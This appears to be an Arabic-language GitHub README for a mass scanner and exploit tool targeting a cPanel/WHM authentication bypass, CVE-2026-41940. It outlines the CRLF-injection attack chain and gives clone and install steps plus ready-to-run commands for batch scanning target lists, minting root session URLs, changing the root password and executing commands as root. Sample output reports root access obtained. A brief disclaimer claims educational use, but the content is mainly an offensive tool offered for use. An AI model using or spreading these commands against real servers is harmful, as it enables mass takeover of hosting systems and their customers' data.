
cPanel/WHM CVE-2026-41940 - ماسح ومستغل جماعي
أداة فحص واستغلال ثغرة تجاوز المصادقة في cPanel/WHM لـ CVE-2026-41940
تم توفير هذه الأداة لأغراض تعليمية وللاختبارات الأمنية المصرح بها فقط.
باستخدامك لهذه الأداة، فإنك توافق على ما يلي:
❗ المؤلف ليس مسؤولاً عن أي إساءة استخدام أو أنشطة غير قانونية أو أضرار أو عواقب قانونية ناتجة عن استخدام هذه الأداة.
CVE-2026-41940 هي ثغرة حرجة في تجاوز المصادقة في cPanel/WHM قد تسمح للمهاجمين بالحصول على وصول غير مصرح به على مستوى الجذر (root) دون بيانات اعتماد صالحة.
توفر هذه الأداة تنفيذًا قائمًا على Python من أجل:
| المرحلة | الوصف |
|---|---|
| 1. ما قبل المصادقة | إرسال بيانات اعتماد غير صالحة إلى /login/ للحصول على Cookie باسم whostmgrsession |
| 2. حقن CRLF | حقن سطر جديد عبر ترويسة Authorization: Basic لتسريب رمز cpsess |
| 3. نشر الرمز | تشغيل do_token_denied لنشر الرمز في الذاكرة المؤقتة (cache) |
| 4. التحقق | الوصول إلى /json-api/version لتأكيد وصول الجذر إلى WHM |
| الميزة | الوصف |
|---|---|
| 🔄 الفحص الجماعي | فحص أهداف متعددة في وقت واحد |
| 🎯 هدف واحد | فحص هدف فردي مع مخرجات تفصيلية |
| 🔌 فحص المنافذ | فحص تلقائي لمنافذ WHM (2082, 2083, 2086, 2087) |
| 🔓 رابط الجلسة | توليد رابط تسجيل دخول WHM بنقرة واحدة |
| 💀 تنفيذ الأوامر عن بُعد (RCE) | تنفيذ أوامر النظام بصلاحيات الجذر |
| 🔑 تغيير كلمة المرور | تعديل كلمة مرور الجذر لـ WHM |
| 📡 استدعاءات واجهة برمجة تطبيقات WHM | استدعاء دوال واجهة برمجة تطبيقات WHM |
| 🎨 مخرجات ملونة | مخرجات مرئية للنتائج |
| 💾 تصدير النتائج | حفظ الأهداف المعرضة للخطر في ملف |
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Single target
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
| المعامل | الوصف | مثال |
|---|---|---|
| -u | رابط هدف واحد | -u https://target.com:2087 |
| -f | ملف قائمة الأهداف | -f targets.txt |
| -c | التزامن (الخيوط) | -c 20 |
| -o | ملف الإخراج | -o results.txt |
| -hostname | ترويسة Host مخصصة | -hostname cpanel.target.com |
| --scan-ports | فحص جميع منافذ WHM | --scan-ports |
| -session | توليد رابط تسجيل الدخول | -session |
| -passwd | تغيير كلمة مرور الجذر | -passwd "NewPass123" |
| -cmd | تنفيذ أمر | -cmd "id" |
| -keep | الاحتفاظ بالحساب المؤقت | -keep |
| -api | استدعاء واجهة برمجة تطبيقات WHM | -api listaccts |
| -api-params | معاملات واجهة البرمجة | -api-params "user=root,password=123" |
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
| الحقل | القيمة |
|---|---|
| CVE | CVE-2026-41940 |
| الخطورة | حرجة (CVSS 9.8) |
| ناقل الهجوم | الشبكة |
| الامتيازات المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
-hostnameللاختبار الآمن والقانوني:
إذا كان هذا المشروع مفيدًا لك، ففكر في منحه نجمة ⭐